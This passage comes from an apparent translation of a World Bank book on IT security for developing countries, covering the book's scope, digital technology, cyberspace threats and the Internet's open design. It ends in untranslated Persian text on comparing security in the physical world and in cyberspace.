• Procedures for the identification, authentication and authorization of users;
• Common security problems in computers used to provide information services, and server configurations for minimizing them;
• Network security from the hardware side (modems, routers and wireless access) and the software side (network protocols used on local networks and the Internet, such as TCP/IP);
• The technologies used to attack workstations and servers, known as denial of service (DoS) and programmed threats;
• How to use auditing and logging tools to help identify vulnerable systems and find what has been changed on them;
• Specific technical recommendations for the Unix, Linux, Windows and Macintosh operating systems.

Because of the size and complexity of the subject, several appendices are also included at the end of the book. Appendix 1 contains a glossary of common terms used in the field of information and communications technology, and Appendices 2 to 5 list the references used in preparing the book. These sources include printed documents, electronic documents and a list of organizations working on security issues. All readers are advised to consult the references listed in the sources and bibliography section.
Next Steps and Conclusion

Digital technology has given us new tools whose major impact is evident in education, health, commerce and other sectors of society. This technology is useful for all countries and people, but it can hold special appeal for developing countries and help them to increase their integration into the global economic community; yet at the same time doing so is very costly for countries. Foreign direct investment and confidence and trust in developing countries depend on the secure and efficient implementation of technology and infrastructure. Governments, organizations and home users all have an important role in securing networks and their electronic and information assets. This book contains a collection of the best current methods and best practices in the field of security, which help readers in implementing policies and procedures as circumstances require. The book also includes numerous references on topics that cover other dimensions of IT security, and so learning its contents counts as a step toward transferring information and building capacity at the local level in today's expanding world. This book has been published by the World Bank, and its compact disc and website, which contain new material on the subject, have also been made available to those interested. The first edition of this book was presented at the World Summit on Information Society (WSIS) in Geneva in December 2003.

Under the Universal Copyright Convention the World Bank wishes to preserve the copyright of this book, and copying of its content for research, education and other purposes is in no way permitted except in developing countries that are members of the World Bank. The findings, interpretations and conclusions in this book all belong to the authors and should not be attributed to the World Bank, its affiliated organizations, the members of its board of directors or its member countries.

IT Security in the Digital Age

Introduction

The advent of digital technology is counted among the most prominent technological advances of the past half-century, and has become a vital factor in human life today.[1] For many of us this kind of technology has taken shape in the form of digital computers and has become a necessary tool for doing our work and meeting personal needs. In 1951, when the first commercial digital computer, the UNIVAC I, was delivered to the U.S. Bureau of Census, many people knew nothing about computers, and those computers were in use at only a handful of universities and research laboratories. These computers were large, expensive and full of faults. By contrast, today's computers are relatively small, cheap and reliable, and can be found in every country.

Shortly after computers became common in universities, research projects began on connecting them to one another so that information could be exchanged between them. Of these projects, the ARPANET network development project was the most successful and turned into what we know today as the "Internet", which currently connects more than 300 million computers around the world.

The World-Wide Web, which was created by Tim Berners-Lee and Robert Cailliau at the Center for European Nuclear Research (CERN) in Geneva in the early 1990s, is a powerful service that makes use of the Internet to create a global information system and has greatly increased the Internet's productivity and appeal. Although many people make no distinction between the World-Wide Web and the Internet, the Web is in fact only one of the services (albeit the most important of them) that have turned the Internet into such a powerful tool for information and communication.

Over the past ten years the Internet has become an important means of communication among all sections of society, and we depend on it for instant access to information, private communications, all kinds of applications, business, working relationships and financial transactions. Reliable and easy access to the Internet is a vital factor in the sustained and continuing success of developed countries, and its importance for developing countries is also growing rapidly. The effects of the use of computers and the results of the Internet revolution have gone beyond their direct benefits, and further effects are expected to be on the way.

First of all, the Internet has blurred the geographic borders between its connected users and has eased the process of globalization by offering the capabilities of communications media, so that anyone can communicate over it regardless of physical location. Search engines have redoubled the effect of this change, because search results appear on the basis of subject and not on the basis of the user's distance from them, so that the websites of factories and companies located in developed and developing countries have an equal chance of being seen by visitors.

The second point is that the Internet has had a dramatic effect on the process of eliminating commercial intermediaries. For example, one can point to the marked fall in the rate of hiring secretaries in developed countries, the reason being that writing, printing and sending a personal message to people using facilities such as word processors and e-mail is easier than dictating the text to a secretary. In the same way, group tourism is also currently heading for extinction, because tourists can book air or rail tickets and the hotel rooms they want online, which saves the customer money and time and makes it possible, with a little care over the bookings, to enjoy a pleasant trip. The emergence of companies selling books, music and electronic products online has threatened and hurt the shops that offer such products, but at the same time in many parts of this trade it has also broadened the range of the target market. Since traditional professions and industries continue to exist, they tend to hire fewer people and may even move toward specialist markets instead of providing general services. The visible effects of the trend of eliminating intermediaries, which began with the advent of this technology, will continue for a long time, and with the growing importance of information technology more industries and professions will be replaced by it.

The third consequence is that productivity, at least in industries that depend on information technology, will rise at a striking pace. With the help of e-mail it has become possible to send and exchange information around the world in just a few seconds, so that global discussions and negotiations can be pursued and concluded much faster than in the past. Business affairs that until recently were carried out by post, telex and telephone are now completed faster and more efficiently by applying new concepts in the mobile telecommunications industry, and this has shortened the time cycle of activities.

[1] Digital Tornado: The Internet and Telecommunications Policy, FCC Staff Working Paper on Internet Policy (1997): http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html
The final point is that keeping information storage and telecommunication lines secure is also essential in this new environment. Today's industry and technology are striving hard to find a way to guarantee the security of their infrastructure, because those involved have realized that most of the Internet's security flaws result from the presence of insecure hardware and software in it. In this environment, establishing confidence and trust in computers, networks and stored data is of more or less the same importance as in an environment where working relationships are conducted through face-to-face conversation.

This is also clear in the case of developing countries: organizations that have not achieved an adequate level of security in their digital infrastructure and do not properly protect the transmission of their information will not be worthy of trust and will be left behind by the caravan of the new global economy.[10]

The Digital Revolution

Today digital technology has moved beyond the realm of computers. Technological advances in the microelectronics industry have made it possible to build complex electronic devices at very small scales, so that you can now carry highly sophisticated communication and computing equipment in your pocket. Moreover, the improvement in the price-to-performance ratio for this kind of technology is around 30% a year, and the likelihood that this rate will hold for the next ten years is also very high.[11] We expect this technology to be widely embraced, to create new arenas in commerce, and to be the starting point for a golden age of digital technology.

Today's modern telephone equipment is entirely digital, and purpose-built computer systems have replaced switching equipment based on mechanical relays. Since the appearance of the compact disc in the late 1980s, sound and music have taken digital form, and with the appearance of the MP3 music format in the late 1990s, sound recording has become entirely digital even in home settings. In the world of photography and filmmaking too, digital images and digital cameras have taken over the capture of images from photographic film.
Today even feature films and cartoons have gone digital, because this lowers their production costs and raises their quality. Videotapes have gradually given way to DVD technology, and feature films are made and edited with digital tools.

Wireless telephone standards are moving toward digital technology, and protocols such as GSM, TDMA and CDMA and their variants will gradually replace the older generation of analog standards. In developed countries digital television has arrived, and before long it will take the place of the existing broadcast standards (although this change will be somewhat slower than the others, because the installed base of home receivers tied to the older standards is very large).

Physical security systems are also turning into their electronic counterparts. In hotels, apartments and offices, physical keys have given way to electronic cards. The television cameras used in the surveillance systems of buildings and facilities also often use electronic equipment that, instead of sending television signals to a video monitor, sends electronic images to digital monitoring stations. [12]

Many of the services we use today could not be offered without computers, networks and digital technology. Airlines could not compete with one another without computerized reservation systems and flight maintenance and support systems. Aircraft depend heavily on electronic sensors and digital controls and cannot work well without them. Even cars use microprocessors to run properly and to help with their own diagnostics and maintenance. Global Positioning System (GPS) receivers let you know where on Earth you are at any moment, and with such a relatively cheap device alongside a computer holding a database of maps you can find your route, points of interest, restaurants, road signs, the services offered along the way, and finally your destination.

These digital devices are being connected to the network at an incredible pace. Wireless phones can connect to the Internet; at first they could send voice, now they can exchange images over the Internet, and soon they will have GPS capability as well, so that people in danger or involved in an accident can be located with great precision using nothing but a phone. Many of the services we now use, such as the automated teller machines used to exchange and transfer money, work on the principle of "network availability". Interbank and international financial and credit transfers depend heavily on credit and financial networks. [14] Today individuals can carry out electronic banking transfers over the Internet.

The development of digital electronic tools and interconnected devices has many benefits, but it has visible drawbacks too. It has become easier for others to find out where you are. It is also simpler than before to see the advertising web pages you view, to find out what you are looking to buy in shops, and to observe what you are watching or reading online. If your interests are being monitored in this way you will as a rule not know about it, but you may want to be sure that such data is collected with your permission and used only for purposes that you know about and agree to. Many people attach great importance to their privacy, and governments too are inclined to protect individuals' rights, although the extent and rigor with which the laws are enforced differ from one country to another.

Footnote 10: Braga, Carlos Prima, Inclusión or Exclusion, UNESCO Courier: http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html

Footnote 11: This rate of technical progress is one consequence of Moore's Law, described in the 1960s by Gordon Moore, the father of Intel. He said that in every two-year period (which he later shortened to 18 months) technology lets manufacturers produce microprocessors with twice the capacity at the same price. This trend has held for the past 40 years and is expected to hold for at least another 10 years.

Footnote 12: This particular case may steer jobs toward developing countries. As soon as images are in digital form and placed on the Internet, they can be sent to a monitoring system anywhere on the network. According to forecasts, this security capability, which requires no special skill, can be set up in developing countries at lower cost and equal quality. The proposal was welcomed by developers, but because this kind of outsourcing crosses national borders, it may give rise to some physical security concerns.

Footnote 14: In the past the interbank financial exchange network used a very secure dedicated network that had been designed for that specific purpose and was not connected to the Internet. Given the great value of that network and the very destructive and serious effects of any intrusion into it, this seems entirely reasonable.
The main challenge for governments is to recognize the benefits of emerging technologies while still preserving the values and freedoms that could be enjoyed without those technologies. The point is that governments must understand new technologies and assess the effect of new capabilities on freedoms. Governments must also take effective steps to make sure that, if laws and public policies in this area do not strengthen existing freedoms, there is at least a collective consensus about them.

The digital world is usually known as cyberspace, and its definition covers all computers and digital devices that are linked together by internal and external networks and can communicate with one another. [16] In cyberspace, as in physical space, one can talk about meetings and getting things done, but a distinction has to be drawn between behavior in cyberspace and behavior in the real world where we live, work and play.

The rapid spread and adoption of personal computers and the Internet in various sectors of developing countries has brought many benefits. Yet the Internet is not in itself a medium that is immune to criminal behavior. The cost of paying too little attention to security can be the loss of the data a large organization or government agency needs to do its work. The Internet is not inherently secure, but the cost of securing it is small compared with the cost of losing the valuable data of organizations and institutions. Another point that can be very important is that the effect of theft and financial wrongdoing in one company is not confined to that company but affects the country's industry as a whole.

With the spread of the Internet and the sharp rise in concern over cyber attacks, the number of such incidents is also increasing:

"Although computers are a suitable point for carrying out terrorist attacks, it should also be borne in mind that some acts of sabotage are carried out by people who are seeking to make money this way. The Computer Emergency Response Team (CERT) identified 52,658 Internet security incidents in 2001, which is double the number a year earlier and four times the number two years before that." [19]

Computer and network security is of particular importance to developing countries. The Internet can eliminate distance and provide access to countless materials. Through the World Wide Web, the Internet will be able to make use of the information available about the companies, facilities and products of developing countries and expand trade in them. In addition, search engines make no geographic distinction between websites, so the suppliers of services, basic goods and raw materials in developing countries appear on the Web side by side with the suppliers of goods and services in developed countries. [20] This is sometimes called the "death of distance", [21] a term that describes the way information flows on the Internet.

Even so, there are always serious risks such as loss of records, denial-of-service attacks, corruption of information and other kinds of hostile attack. Losing all or part of its electronic records can cripple a company. A country whose information technology security is weak may find its vital resources put at risk and irreparably damaged. For countries that value foreign relations in their industries, insufficient attention to security can cause serious and unforeseen losses. Achieving the Millennium Development Goals (MDGs) depends on the ability of developing countries to use information technology effectively and to increase their budgets through permanent membership of the World Trade Organization. [23] The ability to obtain and supply suitable information can help developing countries in every economic field.

Unfortunately, every good and bad aspect of human behavior can be seen in cyberspace too. Because digital content is easy to copy and edit, deception and distortion of information, such as the forging of administrative and official documents, become easy. Because the Internet began in a cooperative research environment and its aim was the easy sharing of information, its structure makes it easier to attack computers and steal confidential information.

The motives of people who behave this way in cyberspace resemble the motives that drive them to similar acts in the real world, with one major difference: the environment created by computers and the Internet has given people the urge to prove that they can get into systems and cause trouble. Most of the problems in cyberspace come from crackers. Crackers are people who want to prove that they can get past any security barrier placed in their way. To model this behavior in the real world, we would have to point to someone who wants to prove that he can enter your house and then leave without touching anything! Such an event not only produces a feeling of insecurity, it also raises the question of what is being changed or going missing, and of what can be done to prevent further intrusions. Just as such behavior is intolerable in the real world, it cannot be tolerated in cyberspace either. The techniques in this book will help you protect yourself against such behavior.

Neither this book nor anything else in cyberspace removes the need for you to keep learning about computers and the Internet and to raise your level of awareness and skill. Today the Internet is the gateway to an astonishing world of information and knowledge and can put that information at the public's disposal at very low cost. In this way information can be shared efficiently and effectively. To achieve this, however, we need to recognize the capabilities and behaviors that may stand in its way. We are familiar with the idea of vigilance in the real world. We must now learn how to be vigilant in cyberspace (cyber vigilance). This book has been prepared to help you do that.

What Is Security?

The concept of security in the real world is vital to many of us. In prehistoric times security meant the basics of survival, such as security against attack by other people or animals, and security of the food supply. Other needs, such as security against natural disasters or disease, were generally not an issue for prehistoric humans. As civilization advanced, the scope of security widened to take in broader dimensions such as having a place to live in comfort and safety, and today the concept of personal property has also been added to the definition of security.

Most of what we do in the real world carries risk, although many of our activities carry little. For example, when we travel with a stranger, or arrive in an unfamiliar city or country, we know that there are threats to our physical safety. The threats around us become serious when we are in an unprotected place and meet someone who can take advantage of our situation. If we pay enough attention to the risks around us we will manage to find a safe place or a way out, for example by joining someone who will lead us to a safe place, or by taking a taxi.

Footnote 16: "Cyberspace" was first used by the writer William Gibson in 1984, in his novel "Neuromancer", for a parallel world built by computers around the globe. This definition may be useful in literature, but its meaning has gradually changed from what Gibson had in mind. For more information see this same footnote in the original book, or the following source: Intven, et al., Legal and Regulatory Aspects of e-Commerce and the Internet, World Bank Legal Review, vol. 1 (Kluwer 2003), at fn 17.

Footnote 19: Reuters/USA Today, April 16, 2003.

Footnote 20: In reality search engines do differentiate among the results they find on the basis of language, so in the global market everyone has to speak the language of their target market. Search engines may also not be patient enough to wait for a response from sites whose connections are slow. In any case, businesses can host their site anywhere in the world and choose the hosting location so that the information is close to the target markets. Some companies use mirror sites, meaning that they host a copy of the site in a different geographic location so as to minimize the time it takes customers to reach the information.

Footnote 21: Cairncross, F., The Death of Distance: How the Communications Revolution will Change our Lives, Harvard Business School Press (1997).

Footnote 23: Information and Internet security is one of the three main topics that the World Summit on the Information Society worked on at its conference in Geneva (December 2003) and is due to work on again in Tunis (April 2005). This is further evidence that the role of information and communication technology in development is gradually approaching its rightful place.
Some activities carry psychological or financial risk but no physical risk. When we invest (whether by buying land or shares, or by going into business or working in the market) we expect a prompt return on our capital. As we know, some investments will pay back sooner or later, while others will not, and some lead to losses. Similarly, when we get to know a new person we hope that the new relationship will bring us something, although we also accept the risk that it may not turn out to be as beneficial as hoped.

In some areas the level of security we expect cannot be attained. For instance, we always want a long life and a healthy body, but the statistics on average life expectancy show that this does not hold for many people. Some of us die young, some struggle with various illnesses during our lives, and some live for many years in good health. We compensate for our inability to determine our fate with insurance, which protects us against the adverse financial effects of accidents and illness.

This introduction sets before us a truth about security: absolute security is impossible, both in real life and in cyberspace; nevertheless, security that is good enough is attainable in almost all circumstances.
There are many ways to obtain mechanisms that strengthen, increase and maintain security. We have physical mechanisms to ensure our security: tall, sturdy buildings and strong, impenetrable doors, together with countless locks and keys. We can also rely on other physical boundaries such as walls and other separating barriers. We can focus adequate lighting on the areas through which an intrusion is likely. Finally, where necessary, and on the assumption that initial intrusion attempts may succeed, we can use alarm systems and stronger guards to detect and deal with those who have managed to get in. Most important of all, we can call on the backing of civil and criminal law and of the police.

We usually use several different methods to increase our security, so that if one measure fails another fills the gap. If a key is stolen and the door lock can no longer be relied on as protection, alarms can be used to warn of an intrusion. The number of boundaries and barriers, of course, depends on the value of what is being protected and on reasonable expectations of an attack on it.

All of these protective measures and methods arise in a different form in cyberspace. We are not as familiar with their nature in cyberspace as we are with physical security measures, but we need to understand them and to know how to apply them when we need to provide security in cyberspace. In both the real world and cyberspace we need to protect and defend our assets against attack by others and, if an attack succeeds, to recover the assets that were lost.
The definitions and explanations found in dictionaries and glossaries for the word security refer to matters connected with safety, such as "the quality or state of being secure, freedom from danger, and freedom from fear or anxiety". However, none of these definitions can be used to describe security in cyberspace precisely.

Instead we propose the following definition: you are secure in cyberspace when access to your information resources is under your own control, that is, no one can access these resources without your permission. These resources include data and computing, network, transaction, processing and information resources. Naturally some of these resources may be provided by others for your use, such as a user account on a shared computer or Internet access through an Internet service provider (ISP). Since these are never completely secure, you can keep control over continued access to the services and proper use of them only as long as you follow the service provider's instructions for using them correctly.

An example of the nature of cyber security is given here. For this purpose we look at the most recent flaw found (up to the publication of this book) in the core of the Microsoft Windows operating system:

"Microsoft discovered a very important vulnerability in almost all existing versions of its Windows operating systems, the first effect of which could be the complete failure of Microsoft Windows Server 2003. Microsoft said this vulnerability could enable intruders to take control of the Windows operating system on their victims' computers over the Internet, steal their information, delete files, or transfer them by e-mail. The company assured its customers that it would immediately place a free patch to fix this flaw on the Microsoft website. ....

This flaw, which was discovered by researchers from Poland, also affected the versions of Windows common among home users: "This is one of the worst Windows vulnerabilities there has ever been," said Marc Maiffret, executive director of eEye Digital Security Inc. of Aliso Viejo, California, whose researchers had discovered similarly dangerous vulnerabilities in three earlier versions of Windows. Of the affected companies Maiffret said: "Until they install this software patch their systems will be like a piece of Swiss cheese, and anyone can easily get into their servers."

But at that same time four Polish researchers known as the "Last Stage of Delirium Research Group" found that they knew a way around Microsoft's new patches, and this was only three months after those patches had been released. Although the Polish researchers designed a tool to prove that more serious vulnerabilities existed and used it to break into several computers, they pledged to leave no trace of these new vulnerabilities on the Internet. Some experts expected intruders to use this new flaw to break into computers within the next few months. Even without this being announced by those researchers, intruders are typically able to get around Microsoft's patches." [32]

Like users and employees inside an organization, we have no control over the code of programs such as Windows. We know that it is very important to software vendors that their programs be secure and free of any error, but when such problems do occur, we can take appropriate measures and decisions to obtain and install the vendors' corrected versions, and this is the only countermeasure available to us.

In the real world we know how to protect our information resources, and we also know that some information has to be kept confidential while some can be passed on freely. To this end we lock office doors and filing cabinets, and we may even keep copies of important information away from the office so as to protect it in the event of fire or other natural disasters. Some information can be passed only to a limited number of people, and depending on how important the information is, different people can be trusted to different degrees.

Conceptually there is no difference between the nature of threats in cyberspace and threats in the real world; rather, the difference between the two stems from the characteristics of the electronic realm and of the threats in it, which make it possible to prevent and neutralize those threats, or to detect and remedy them.

The topics of privacy and confidentiality are related to security. Information that is regarded as "private" can only really stay private if it is stored securely. To that end, in the real world we behave as though such information does not exist. This policy is called security by obscurity. Likewise, information that has to be shared in confidence must remain secure for those who have shared it. If these people are not always in the same place, adequate security policies must be applied to the information when it is transferred.

Situations like this also exist in cyberspace, but given the particular nature of cyberspace and the connections between the computers in it, security by obscurity, that is, relying on concealment, proves to be a weak policy and should be avoided. This book provides, at various levels of detail, information on the security measures that cyberspace requires.

The Emergence and Growth of the Internet

The computing and networking environment of today's Internet was originally created for research and education. When the ARPANET (the early Internet) was first set up, its main purpose was to share resources among many groups of researchers in different geographic locations. These groups had common goals and worked with the aim of sharing resources and data; access to the network was limited to members of these groups, and so at the time there was little concern about securing information. The World Wide Web was designed on the same basis, to be a powerful tool for discovering information resources and making them available to others, without any mechanism for obtaining authorization or facilitating financial investments.

The culture of information sharing among researchers and academics was introduced by the ARPANET during the 90s, and signs of it can still be seen. Under this culture, information on the World Wide Web is as accessible and free as possible, and hundreds of millions of people around the world are able to use it. This is very important and is one answer to the question of why the Internet has grown to its present size. The ethical side of this culture can be seen in the everyday talk of people who describe the Internet as a very good and reliable source, because they have seen the Internet's power as a medium and the effects of working with it. It is sometimes said of the nature of the Internet that "information in it wants to be free".

Footnote 32: Ted Bridis, Associated Press, July 16, 2003.
Another explanation for the Internet's current vulnerabilities is that the first generation of the Internet was built on mutual trust, and users openly trusted one another in order to work together. As the Internet spread widely and more people with different interests and goals joined it, mutual trust lost its meaning. At present one of the major topics on the Internet is the development of a new concept of mutual trust, in a form that is effective, realistic and easy to implement.

The Internet differs from the communication systems that preceded it in several fundamental ways, each of which is of particular importance. Some of these differences are better understood when we compare the Internet with the public switched telephone network (PSTN), which is used every day all over the world.

The Internet works on a model of information transfer called packet switching. Whenever information travels across the Internet it is broken into a number of data packets. These packets are encoded, each is sent through the network independently, and they are reassembled once received at the destination (the routes they take may differ). This method of transfer is the opposite of circuit switching, which the PSTN uses. In that method a single circuit is dedicated to each telephone call, and so the amount of voice being carried at any moment does not matter.

The Internet is a dumb medium, because all it knows is that it has to deliver a packet from a source connected to the network to a destination connected to the network. All Internet services ultimately reside at the edges, on the computers that are connected to the network. In the PSTN, by contrast, the network itself is built on "intelligence", and the user's devices at the endpoints serve for little more than talking or listening.

The Internet is global. It connects many countries, and through it information flows to different people across geographic borders. This is its most prominent and interesting feature, though it has little to do with security. The PSTN is global too, but telephone access to other countries is not as easy as on the Internet; for example, a telephone user knows that he has called a foreign country, but when he accesses a website he need not know where in the world its server is located.

The Internet is open. It can be thought of as a network of networks: any network that belongs to the TCP/IP (Transmission Control Protocol/Internet Protocol) family of protocols can connect to it and become part of it. The standards that define this protocol suite are issued by the IETF (Internet Engineering Task Force), and their informal technical body of work is usually developed on the basis of technical meritocracy and the implementation of consensus standards.

The Internet is decentralized. It has no central communication system, and as long as you follow its core protocols such as TCP/IP you can connect your computer or network to the Internet.

The Internet is everywhere, and the barriers to entry are low. The amount of bandwidth (the speed at which you can transfer data) depends on the carrying capacity of the copper wires, fiber links or satellite channels along the transmission path. There is no scarce electromagnetic spectrum on its highway. Wherever radio spectrum is used, as in wireless local area networks (WLANs), commonly referred to as Wi-Fi, the associated rules and protocols create a shared environment that makes access simple.

The Internet is relatively inexpensive for average users in those parts of the world where local telephone calls are free. The price of Internet access over telephone lines, in Internet cafés and at other public access points in these countries is very low, and as a result Internet access is much simpler for a large percentage of the world's people.

The Internet has removed the barrier between author and publisher. You can be a publisher and set up network services on your own computer; all that is needed is for your computer to be permanently connected to the Internet. You can also decide what services you offer, and anyone else who is connected to the Internet and has your permission can connect to your computer and use those services.

The Internet can be controlled and listened in on by users, but in many countries you can choose whether or not the messages and other data you send are encrypted to counter eavesdropping. In addition, the filtering of messages is under your control, although you can ask an outside party to do it for you, for example by asking your ISP to filter unwanted messages according to rules that you define yourself.

The Internet is an interactive medium. You can quickly and easily view many websites, or receive e-mail from many people and send e-mail to them. Because the waiting time for online services depends on the bandwidth of your connection, getting a response from these services may take a little while.
The Internet can be vulnerable, because it was originally founded on serving cooperating and fairly similar groups of people, and instead of using reliable authentication mechanisms, everyone on it was trusted. This book introduces you to the Internet's vulnerabilities and offers a set of security best practices to help you reduce vulnerability.

From the characteristics above you should by now have a picture of the Internet in your mind as a place where every kind of activity is permitted and nothing is restricted or under control. This openness reflects the Internet's research and academic roots well and shows its benefits for every part of society. The Internet was not designed with security in mind; it came into being to increase the fruits of shared activity. This degree of freedom of action creates opportunities for people to misuse networks and do serious harm to others. We must first understand the nature of such misuse and then secure our networks against it.

Issues in Information Security

The concepts of computer, network and data security in cyberspace are the same as in the real world, but the mechanisms for implementing the related procedures are different. For example, to use the user accounts that grant access to information or services, we have a username and password instead of physical or electronic keys, and instead of using sealed envelopes to transfer information we can encrypt the data in transit so that it cannot be read by unknown parties.
ﺩﺭ ﻣﻘﺎﻳﺴﺔ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺎ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺗﺨﻠﻔـﺎﺕ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺒﻴﻨـﻴﻢ .ﺩﺭ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ ﻭ ﻳـﺎ ﺍﻣـﻀﺎﻫﺎﻱ ﺟﻌﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻫﺮ ﺩﻭ ﻓﻀﺎ ﺍﻣﻜﺎﻥ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﻏﻠﻂ ﻳﺎ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﻫﻤﭽﻨـﻴﻦ ﺍﻣﻜـﺎﻥ ﺑـﻪ ﺍﺷـﺘﺒﺎﻩ ﺍﻧــﺪﺍﺧﺘﻦ ﺍﺷــﺨﺎﺹ ﺑـﺎ ﺍﻃﻼﻋــﺎﺕ -ﭼــﻪ ﺑــﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﭼﻪ ﺍﺯ ﺭﻭﻱ ﻋﻤﺪ -ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﻧﺘــﻮﺍﻥ ﺗﻌﻴــﻴﻦ ﻛــﺮﺩ ﻛــﻪ ﭼــﻪ ﺍﻃﻼﻋــﺎﺗﻲ ﻣﻬــﻢ ﻭ ﻗﺎﺑــﻞ ﺗﺄﻳﻴــﺪ ﻫﺴﺘﻨﺪ ٤٤.ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺭ ﻫـﺮ ﺩﻭ ﻓـﻀﺎ ﺍﻣﻜـﺎﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺻـﺪ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ. ﺍﻣﺎ ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺷﺒﺎﻫﺘﻬﺎ ﺳﻪ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ ﻣﻴـﺎﻥ ﺍﻳـﻦ ﺩﻭ ﻓـﻀﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ: ﺍﻭﻝ :ﻫﺮ ﻧﻮﻉ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ؛ ﻳﻌﻨﻲ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺁﮔـﺎﻩ ﺷـﻮﻳﺪ ﭼـﻪ ﺍﺗﻔﺎﻗﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺷﻤﺎ ﺍﻓﺘﺎﺩﻩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﺑـﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻳـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ .ﺍﻟﺒﺘـﻪ ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﻱ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻥ ﺯﻣـﺎﻥ Username Password ۴۴ ﻛﺎﭘﻴﺘﺎﻥ ﻛﺸﺘﻲ ﻣﻌﺮﻭﻑ ﺗﺎﻳﺘﺎﻧﻴـﻚ ﺍﺯ ﺭﺍﺩﻳـﻮﻱ ﺍﻭﻟﻴـﻪ ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺍﺯ ﻛﺸﺘﻲ ﺑﺎ ﺳﺎﺣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ .ﻣﻨﺸﻲ ﺭﺍﺩﻳﻮ ﻛﻪ ﺍﻭﻟﻴﻦ ﺳﻔﺮ ﺩﺭﻳﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻣـﻲﻛـﺮﺩ ﺁﻧﻘـﺪﺭ ﭘﻴﺎﻣﻬـﺎﻱ ﺷﺨـﺼﻲ ﺩﺭﻳﺎﻓـﺖ ﻣﻲﻧﻤﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ -ﻫﺸﺪﺍﺭ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻮﻩ ﻳﺨـﻲ ﺑـﺰﺭﮒ ﺩﺭ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ﻛﺸﺘﻲ -ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻭ ﺷﺎﻳـﺴﺘﺔ ﭘﻴﮕﻴـﺮﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﺪ .ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺸﺘﻲ ﺑﺎ ﻛﻮﻩ ﻳﺨﻲ ﺑﺮﺧﻮﺭﺩ ﻛـﺮﺩ ﻭ ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻌﺪ ﻏﺮﻕ ﺷﺪ. 
